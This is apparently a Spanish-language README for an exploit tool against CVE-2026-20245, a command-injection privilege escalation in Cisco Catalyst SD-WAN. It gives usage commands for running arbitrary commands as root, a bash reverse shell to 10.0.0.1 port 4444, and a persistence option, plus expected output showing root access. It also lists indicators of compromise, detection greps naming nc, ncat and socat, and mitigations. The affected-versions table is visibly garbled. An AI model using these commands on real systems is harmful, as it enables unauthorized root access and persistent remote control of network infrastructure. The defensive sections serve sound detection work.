Share
## https://sploitus.com/exploit?id=8C72560D-2636-5AF7-9D4F-7FFB1220841A
# CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit
[](https://nvd.nist.gov/vuln/detail/CVE-2026-20245)
[](https://nvd.nist.gov/vuln/detail/CVE-2026-20245)
[](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
## ⚠️ ADVERTENCIA
**Este código es SOLO para fines educativos y pruebas de seguridad autorizadas.**
## 📋 Descripción
CVE-2026-20245 es una vulnerabilidad de **escalada de privilegios** en la CLI de Cisco Catalyst SD-WAN Controller (vSmart), Cisco Catalyst SD-WAN Manager (vManage), y Cisco Catalyst SD-WAN Validator (vBond). Un atacante autenticado con privilegios netadmin puede ejecutar comandos arbitrarios como root mediante la carga de un archivo especialmente diseñado.
### Detalles Técnicos
| Campo | Valor |
|-------|-------|
| **CVE** | CVE-2026-20245 |
| **CVSS** | 7.8 (High) |
| **Vector** | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| **Componente** | CLI / CSV Upload |
| **Tipo** | Command Injection (CWE-116) |
## 🎯 Versiones Afectadas
| Producto | Versiones vulnerables |
|----------|----------------------|
| Cisco Catalyst SD-WAN Manager | =2.31.0
🚀 Uso
Verificar versión
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
Ejecutar comando
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
Reverse shell
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
Instalar persistencia
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
🔍 Output esperado
text
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit ║
║ Command Injection via Crafted File Upload ║
║ CVSS: 7.8 (High) | CISA KEV: 2026-06-09 ║
╚═══════════════════════════════════════════════════════════════════╝
[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload
============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
🔍 Indicadores de Compromiso (IOCs)
Verificar en logs (/var/log/scripts.log)
bash
# Buscar actividad sospechosa
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log
# Comandos específicos a buscar
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
Archivos sospechosos
/home/admin/*.csv (archivos CSV no autorizados)
/tmp/*.csv
/var/log/scripts.log con entradas inusuales
Procesos
bash
# Buscar procesos root inusuales
ps aux | grep -E "bash|sh|nc|ncat|socat"
🛡️ Mitigación
Opción 1 - Actualizar a versión fija (RECOMENDADO)
Versión Fixed Release
20.18.2.1 y anteriores 20.18.3.1
Opción 2 - Limitar acceso
Restringir acceso administrativo a la red de gestión
Usar autenticación multifactor
Monitorear actividad de CSV upload
Opción 3 - Configuración segura
text
# Deshabilitar upload de serial numbers si no es necesario
no feature upload-serial-numbers
# Limitar privilegios netadmin
admin privilege restrict
📚 Referencias
Cisco Security Advisory
NVD - CVE-2026-20245
CISA KEV Catalog
📊 Timeline
Fecha Evento
2026-05-14 Cisco publica advisory inicial
2026-06-04 CVE publicado oficialmente
2026-06-09 CISA añade a KEV
2026-06-23 Fecha límite CISA para parchear
⚖️ Disclaimer
Este software se proporciona "tal cual", sin garantías. El autor no es responsable por el uso indebido. Úselo únicamente en sistemas autorizados.